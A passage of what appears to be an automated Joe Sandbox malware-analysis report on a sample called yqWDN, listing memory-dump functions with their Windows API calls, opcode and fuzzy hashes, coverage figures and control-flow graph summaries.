                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.378693090.0000000004CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_4cf0000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID: ResumeThread
                                                                          • String ID:
                                                                          • API String ID: 947044025-0
                                                                          • Opcode ID: 0333b8f278ea4385645473b76d22498a7ef8049f092d7122a7f3b8e48ca7b751
                                                                          • Instruction ID: 9e5bdaf2aad886264af5e3b17f2fa7ab00084f7ff3e08bf8f8377830f4930654
                                                                          • Opcode Fuzzy Hash: 0333b8f278ea4385645473b76d22498a7ef8049f092d7122a7f3b8e48ca7b751
                                                                          • Instruction Fuzzy Hash: 181115B1800249CFCB10DF9AD884BDEBBF8EB48324F24841AD519A7351C774A944CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • PostMessageW.USER32(?,?,?,?), ref: 04CF3D5D
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.378693090.0000000004CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_4cf0000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID: MessagePost
                                                                          • String ID:
                                                                          • API String ID: 410705778-0
                                                                          • Opcode ID: 9e404b29702e2d21523e2be14ca896bfc95c7598e41639a6c30a49a1d2a3a6ea
                                                                          • Instruction ID: 778cc6d7b701114962b41595fc18aeb2bc860bfcdbd90bac12ec823b40a420fe
                                                                          • Opcode Fuzzy Hash: 9e404b29702e2d21523e2be14ca896bfc95c7598e41639a6c30a49a1d2a3a6ea
                                                                          • Instruction Fuzzy Hash: F111D3B5800249DFDB10DF9AD884BDEBBF8EB48324F14841AE959A7211C374A544CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • SetWindowLongW.USER32(?,?,?), ref: 02C6FCFD
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.373137415.0000000002C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_2c60000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID: LongWindow
                                                                          • String ID:
                                                                          • API String ID: 1378638983-0
                                                                          • Opcode ID: 84e565e380bb32fb2c4ad6a6cab1d6547caffc3e7fc1e6f5e0e1aa38420e0e3f
                                                                          • Instruction ID: bf20b0ea16d24cb5b7a132f944affba6f7b885ef1afd6c7a3e91f677e5a95729
                                                                          • Opcode Fuzzy Hash: 84e565e380bb32fb2c4ad6a6cab1d6547caffc3e7fc1e6f5e0e1aa38420e0e3f
                                                                          • Instruction Fuzzy Hash: 571145B5800249CFDB10CF99D585BEEBBF4EB48324F20854AE859A7300C374A944CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.378693090.0000000004CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_4cf0000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID: ResumeThread
                                                                          • String ID:
                                                                          • API String ID: 947044025-0
                                                                          • Opcode ID: efdcde08f23b4c39069f89edc892b15e5ce294b4cdc87a6d0338a9e0aa7889be
                                                                          • Instruction ID: 3fa3b370804a1664335f1f28a6471d82e4231f4b06205b502cf9b4412e80c9de
                                                                          • Opcode Fuzzy Hash: efdcde08f23b4c39069f89edc892b15e5ce294b4cdc87a6d0338a9e0aa7889be
                                                                          • Instruction Fuzzy Hash: C71127B1800249CFCB10DF9AD844BDEFBF8EB48324F20841AD519A7310C774A944CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.372286511.000000000113D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0113D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_113d000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 22367060849f3af6c99fad811028324cca91435d2c6348da47b17d1e9b8795ac
                                                                          • Instruction ID: 6a7fa838e59fa44ad8a13975b7554790ff3e30b670a037aa4c0c60b60ba60852
                                                                          • Opcode Fuzzy Hash: 22367060849f3af6c99fad811028324cca91435d2c6348da47b17d1e9b8795ac
                                                                          • Instruction Fuzzy Hash: F52128B1504240DFDF09DF54E8C0B66BF75FBC4328F658569E9064B28AC336D855C7A2
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.372406311.000000000125D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0125D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_125d000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a1df2f515d8a16e735fb653fe76be4c3a743972be6752b09966c170ad21d6d7e
                                                                          • Instruction ID: e77bd028dc89fbee7d3dae870e8286935dd258dbe1f35c32dfbcf46f079bbc00
                                                                          • Opcode Fuzzy Hash: a1df2f515d8a16e735fb653fe76be4c3a743972be6752b09966c170ad21d6d7e
                                                                          • Instruction Fuzzy Hash: E52167B1514208DFDB41DF94C8C0B26BB61FB84364F24C66CED098B243C376D846CB61
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.372406311.000000000125D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0125D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_125d000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 338d00a139269223b87b01db5f8515abd181e1bf789737f1b9ba59869026a974
                                                                          • Instruction ID: b32d6b23d6370963d1b907a25c17393581eb90dba58f3fd19b79205c013f0365
                                                                          • Opcode Fuzzy Hash: 338d00a139269223b87b01db5f8515abd181e1bf789737f1b9ba59869026a974
                                                                          • Instruction Fuzzy Hash: E82134B1518248DFDB51DF64D8C0B26BB65FB84364F24C96DED0A4B246C37AD807CB61
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.372406311.000000000125D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0125D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_125d000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 64e40a8304ca229ffaae2799fa91f198b403f04802d0bdfdb65cf2a3d05c4c9b
                                                                          • Instruction ID: d5218278ebc8eba2255116d70009b8378539f6260395172e1bdb39f743700cdc
                                                                          • Opcode Fuzzy Hash: 64e40a8304ca229ffaae2799fa91f198b403f04802d0bdfdb65cf2a3d05c4c9b
                                                                          • Instruction Fuzzy Hash: D7219D755093848FDB02CF24D9D0B15BF71EB46314F28C5EAD9498B6A7C33AD84ACB62
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.372286511.000000000113D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0113D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_113d000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4244a9aae6d80b52576d8183ab5a55eec2a15cebe5e8ad83433696fc3d306fb5
                                                                          • Instruction ID: f1840641aeb3c9885e074650c42b9f9589bd032da5eee4fc0e5021a25f2c98d8
                                                                          • Opcode Fuzzy Hash: 4244a9aae6d80b52576d8183ab5a55eec2a15cebe5e8ad83433696fc3d306fb5
                                                                          • Instruction Fuzzy Hash: 9311B176904280CFDF16CF54E5C4B16BF72FB84324F2486A9D9054B65BC336D45ACBA2
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.372406311.000000000125D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0125D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_125d000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: dc7e01eeaf6b7fcf3c612de606988f7e81d04e4c628bf39ec0a86da91ad33e64
                                                                          • Instruction ID: fcb516011f13a8a349d7b7b3fb521a8b3868e4d395c09e17e81a48d1c325cec5
                                                                          • Opcode Fuzzy Hash: dc7e01eeaf6b7fcf3c612de606988f7e81d04e4c628bf39ec0a86da91ad33e64
                                                                          • Instruction Fuzzy Hash: 7411BB75904284DFDB42CF54D5C0B15BBB1FB84224F28C6ADDD498B657C33AD44ACB61
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.372286511.000000000113D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0113D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_113d000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 866cc1be59bd30b3d70f3238087c26eccb5294c84b3534f8c624d9b11dd54fd4
                                                                          • Instruction ID: cdc94896ea4c1994b7897de353ca777069ae00af179905d1b0d2aabcfa231021
                                                                          • Opcode Fuzzy Hash: 866cc1be59bd30b3d70f3238087c26eccb5294c84b3534f8c624d9b11dd54fd4
                                                                          • Instruction Fuzzy Hash: F9014C714087D09AEB165B95DC84766BB98EF8127CF09C519EE094B24BC3349804C672
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.372286511.000000000113D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0113D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_113d000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 182157e552f12fe80c67616068fdc1ccd8e02f02a2505145dbdecea3f17d4f38
                                                                          • Instruction ID: 975f64504d1d255b85d41fce8e5fd6c774ebc9b8df5bc276f6e9459cedf036fc
                                                                          • Opcode Fuzzy Hash: 182157e552f12fe80c67616068fdc1ccd8e02f02a2505145dbdecea3f17d4f38
                                                                          • Instruction Fuzzy Hash: 19F0C2714046849EFB158E59DC84B62FF98EB81678F18C05AEE084B28BC3789848CAB1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Execution Graph

                                                                          Execution Coverage:10.8%
                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                          Signature Coverage:0%
                                                                          Total number of Nodes:105
                                                                          Total number of Limit Nodes:6

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32 ref: 012CB590
                                                                          • GetCurrentThread.KERNEL32 ref: 012CB5CD
                                                                          • GetCurrentProcess.KERNEL32 ref: 012CB60A
                                                                          • GetCurrentThreadId.KERNEL32 ref: 012CB663
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.369780519.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_12c0000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID: Current$ProcessThread
                                                                          • String ID:
                                                                          • API String ID: 2063062207-0
                                                                          • Opcode ID: d658a32a7ee45c92482569ae4ec6cea41d9b8b47fb32d32d461795dc524e6799
                                                                          • Instruction ID: 6037e370f5852a272cdb796641cbb06746c2f479f93baafcf4b61518cdf7f55f
                                                                          • Opcode Fuzzy Hash: d658a32a7ee45c92482569ae4ec6cea41d9b8b47fb32d32d461795dc524e6799
                                                                          • Instruction Fuzzy Hash: 1F5163B0D006498FDB14CFAAD589BEEBBF0EF98354F248599E149A3390D7349948CF61
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32 ref: 012CB590
                                                                          • GetCurrentThread.KERNEL32 ref: 012CB5CD
                                                                          • GetCurrentProcess.KERNEL32 ref: 012CB60A
                                                                          • GetCurrentThreadId.KERNEL32 ref: 012CB663
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.369780519.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_12c0000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID: Current$ProcessThread
                                                                          • String ID:
                                                                          • API String ID: 2063062207-0
                                                                          • Opcode ID: b3f01a9234fe5d58786455acd3cfdde8754d9d6dc073f582e5b977d7be59c91a
                                                                          • Instruction ID: a14d9c872793b80327871c66d3e04512b9c4a9f96b05c4625c76e922e6532afc
                                                                          • Opcode Fuzzy Hash: b3f01a9234fe5d58786455acd3cfdde8754d9d6dc073f582e5b977d7be59c91a
                                                                          • Instruction Fuzzy Hash: 525164B0D006498FDB14CFAAD548BDEBBF0EF88354F248599E149A7350D734A948CB61
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 012CFB6A
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.369780519.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_12c0000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID: CreateWindow
                                                                          • String ID:
                                                                          • API String ID: 716092398-0
                                                                          • Opcode ID: 8457ddc383a566d46dd4f83c75f4e000b72f6de36b5b49999f333911fa769cd3
                                                                          • Instruction ID: bf8057648df689adbed87ad6808566402d03719aaacc45c018e08725b87123f8
                                                                          • Opcode Fuzzy Hash: 8457ddc383a566d46dd4f83c75f4e000b72f6de36b5b49999f333911fa769cd3
                                                                          • Instruction Fuzzy Hash: EA8183B2C043889FDF02CFA5C8946DDBFB1AF59314F19819AE944AB262D3348846CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.369780519.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_12c0000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID: HandleModule
                                                                          • String ID:
                                                                          • API String ID: 4139908857-0
                                                                          • Opcode ID: ce39a163636d3d4a20e55a7f3ace9969d48b3d1df51f8812dacde4f3d4875ac9
                                                                          • Instruction ID: ec535d929be4fd7238f7e745a3161fb6463a838f0b77ddac0a57d36336b9d836
                                                                          • Opcode Fuzzy Hash: ce39a163636d3d4a20e55a7f3ace9969d48b3d1df51f8812dacde4f3d4875ac9
                                                                          • Instruction Fuzzy Hash: 22714470A10B058FDB24DF2AD04579ABBF1FF88708F108A2DD69AD7A40DB75E845CB91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 012CFB6A
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.369780519.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_12c0000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID: CreateWindow
                                                                          • String ID:
                                                                          • API String ID: 716092398-0
                                                                          • Opcode ID: 1b870cd3a0fc51e46f21f62b7f03ef51f9e9cd3bed533ac8b4e99418287b46b1
                                                                          • Instruction ID: ffc153cf795a7d9d86482b076c8e03b76d789c9475ae3b0945e3bef054e88ac3
                                                                          • Opcode Fuzzy Hash: 1b870cd3a0fc51e46f21f62b7f03ef51f9e9cd3bed533ac8b4e99418287b46b1
                                                                          • Instruction Fuzzy Hash: 5E51C2B1D103499FDB14CFA9C994ADEBFB1BF88314F24822EE515AB210D7749845CF90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 012CFB6A
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.369780519.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_12c0000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID: CreateWindow
                                                                          • String ID:
                                                                          • API String ID: 716092398-0
                                                                          • Opcode ID: e4c9448ba689358fa6122dea7493194515038f9656a28ebe980622f49cb91529
                                                                          • Instruction ID: 8cf5cc408105faf096adda9bff767d41cb8c64227f199bce2ac6e82ec0920d33
                                                                          • Opcode Fuzzy Hash: e4c9448ba689358fa6122dea7493194515038f9656a28ebe980622f49cb91529
                                                                          • Instruction Fuzzy Hash: 6F41C1B1D103099FDB14CFAAC984ADEBBB5FF88714F24822EE519AB210D7749845CF90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 012CBBE7
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.369780519.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_12c0000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID: DuplicateHandle
                                                                          • String ID:
                                                                          • API String ID: 3793708945-0
                                                                          • Opcode ID: 3fc3653d768d06653fb81e762a016c55813d8b477a875f69b39e6562d79b8c90
                                                                          • Instruction ID: 58f5435266fe5065d74655f0ab80592d4bbe22e3799443f9296f3f41f64728f6
                                                                          • Opcode Fuzzy Hash: 3fc3653d768d06653fb81e762a016c55813d8b477a875f69b39e6562d79b8c90
                                                                          • Instruction Fuzzy Hash: 3D21E6B5D002599FDB10CFAAD485ADEFFF5EB58320F15801AE954A3310D3749945CFA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 012CBBE7
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.369780519.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_12c0000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID: DuplicateHandle
                                                                          • String ID:
                                                                          • API String ID: 3793708945-0
                                                                          • Opcode ID: 1d354fbed003ed9b54cba88dc19618bd829dcdc0aaf9d2f126c8dba4cc83944c
                                                                          • Instruction ID: f39ea6ec5198e6df02ab5c761bb3466cf3794739980a829b37922e277ed2b1bf
                                                                          • Opcode Fuzzy Hash: 1d354fbed003ed9b54cba88dc19618bd829dcdc0aaf9d2f126c8dba4cc83944c
                                                                          • Instruction Fuzzy Hash: 5B21D3B5D002599FDB10CFAAD985ADEFBF8FB48324F14841AE954A3310D374A944CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0719BDCB
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.377826386.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_7190000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 0916d993a453c6c7728649182caec29eb7ba89025a31db8aa694be549d616c4b
                                                                          • Instruction ID: 48b80cf0d626da07b8739af2f5e18bb9877915d34b217a1068be1f06e9ab5d6d
                                                                          • Opcode Fuzzy Hash: 0916d993a453c6c7728649182caec29eb7ba89025a31db8aa694be549d616c4b
                                                                          • Instruction Fuzzy Hash: 3B2103B19002499FCB10CF9AD884BDEBBF4EB48324F10842AE458A7240D378A545CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • LoadLibraryExW.KERNELBASE(00000000,?,?), ref: 012C9A02
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.369780519.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_12c0000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID: LibraryLoad
                                                                          • String ID:
                                                                          • API String ID: 1029625771-0
                                                                          • Opcode ID: ed8bc4126abebbc62805812f9db2a4b841961993a9bb12b8ca707b4474cc4549
                                                                          • Instruction ID: f3b73589e58b1a6662875b3341f27472ac2386ae4c44004ad442f0bfc6e8e507
                                                                          • Opcode Fuzzy Hash: ed8bc4126abebbc62805812f9db2a4b841961993a9bb12b8ca707b4474cc4549
                                                                          • Instruction Fuzzy Hash: 111103B69002498FDB10CFAAD484ADEFBF4AF88314F14856EE555A7200C374A549CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

Control-flow Graph

Control-flow graph: blocks 251 (12c9998-12c99d8), 252 (12c99da-12c99dd), 253 (12c99e0-12c9a0f, calls LoadLibraryExW), 254 (12c9a18-12c9a35), 255 (12c9a11-12c9a17); edges 251->252, 251->253, 252->253, 253->254, 253->255, 255->254
APIs
• LoadLibraryExW.KERNELBASE(00000000,?,?), ref: 012C9A02
Memory Dump Source
• Source File: 00000010.00000002.369780519.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_12c0000_yqWDN.jbxd
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
• Opcode ID: 7f5d57ee5c0296800bfe92a1bfd17b974f82c3016fb13c117d35c7cf1b8aab89
• Instruction ID: 138f9965b5657b5045d4cfd1a77fea0ce456a6c34a53a0aaa4275e73870452f0
• Opcode Fuzzy Hash: 7f5d57ee5c0296800bfe92a1bfd17b974f82c3016fb13c117d35c7cf1b8aab89
• Instruction Fuzzy Hash: 1F1123B6D002498FDF10CFAAC844ADEFBF8EB88324F14852EE515A7200C374A545CFA1
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph

Control-flow graph: blocks 258 (12c911c-12c9750), 260 (12c9758-12c9783, calls GetModuleHandleW), 261 (12c9752-12c9755), 262 (12c978c-12c97a0), 263 (12c9785-12c978b); edges 258->260, 258->261, 260->262, 260->263, 261->260, 263->262
APIs
• GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,012C9543), ref: 012C9776
Memory Dump Source
• Source File: 00000010.00000002.369780519.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_12c0000_yqWDN.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
• Opcode ID: f518be2ec91a7c6752d68483242a9debba4919cffedb56d2ec4127bf6693e2d2
• Instruction ID: d9bd922503387dc642bd7d860f1f754c24570860d68ed907fe47d3505f4ebb0d
• Opcode Fuzzy Hash: f518be2ec91a7c6752d68483242a9debba4919cffedb56d2ec4127bf6693e2d2
• Instruction Fuzzy Hash: 3E1120B5D002498BCB24CF9AC448BDEBBF8EB89324F15855AD529B7200D375A549CFA1
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000010.00000002.374740764.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_4c60000_yqWDN.jbxd
Similarity
• API ID:
• String ID: GF{
• API String ID: 0-1065277956
• Opcode ID: a3a0f5288fe87fe155800efd85a7f5ed2a133ec77af0d9acfb65feb4012c8c29
• Instruction ID: d6d3d44841a573a08c63b2c22be85d857de34dfaee66b21ec0f7f5f8d565aaaf
• Opcode Fuzzy Hash: a3a0f5288fe87fe155800efd85a7f5ed2a133ec77af0d9acfb65feb4012c8c29
• Instruction Fuzzy Hash: F7F0F071D08286DBCB01CFA3CCC428CFFB1AA12160B28861AE05277292EB20B002DF05
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000010.00000002.374740764.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_4c60000_yqWDN.jbxd
Similarity
• API ID:
• String ID: GF{
• API String ID: 0-1065277956
• Opcode ID: 7febc4fdacb53e0e669c8251a5b6f548619ada7b66d91791fbb7dbdc053764ba
• Instruction ID: bf107dc42ae084a34b838188c3a8c912231c2a45e7058b0453b88753a005a1a2
• Opcode Fuzzy Hash: 7febc4fdacb53e0e669c8251a5b6f548619ada7b66d91791fbb7dbdc053764ba
• Instruction Fuzzy Hash: 51E086765010809BC704CF65CDDA689BBF5EF412D8B185496D9629F21BE6247002DB24
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000010.00000002.374740764.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_4c60000_yqWDN.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: bd0aae0c60e1006688c0b16af1be21d62d4ebe5d08b60e6ff1bd4a7d8b496f2a
• Instruction ID: 38de0fb7c9fd2ecd64862650d174ca34593441398e3155160eba2d5026898376
• Opcode Fuzzy Hash: bd0aae0c60e1006688c0b16af1be21d62d4ebe5d08b60e6ff1bd4a7d8b496f2a
• Instruction Fuzzy Hash: D2F0CFB48042A9DFCB58CFA5DA8479CBBB1AB08315F10809AD406BB210DB301A88CF20
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000010.00000002.374740764.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_4c60000_yqWDN.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6511c75084f8304de459965e3bd66bead0726ed1c28ed8d5a4aa2be48825c0f8
• Instruction ID: 2e161500c1846a392a8467846f76f86fb1831360d4da243b249f74e5602eca1f
• Opcode Fuzzy Hash: 6511c75084f8304de459965e3bd66bead0726ed1c28ed8d5a4aa2be48825c0f8
• Instruction Fuzzy Hash: AEE086210593D55AC753C3A4A9567D77F94AF03128B1842CBD9945F1E3D7260B42C286
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000010.00000002.374740764.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_4c60000_yqWDN.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 63be4395ba761676f48088cc11e9de040e6be40326b1c03ab7fe3bd45d1351bd
• Instruction ID: 985f796fc38a9ddb5a7ee5c5c68181688511a37f57d31f7be48c761ef6f374d5
• Opcode Fuzzy Hash: 63be4395ba761676f48088cc11e9de040e6be40326b1c03ab7fe3bd45d1351bd
• Instruction Fuzzy Hash: 14D0A73081210CDBC744EFF4A54679EBBBCAB00604F6040A9890853241EB311F05C681
Uniqueness
Uniqueness Score: -1.00%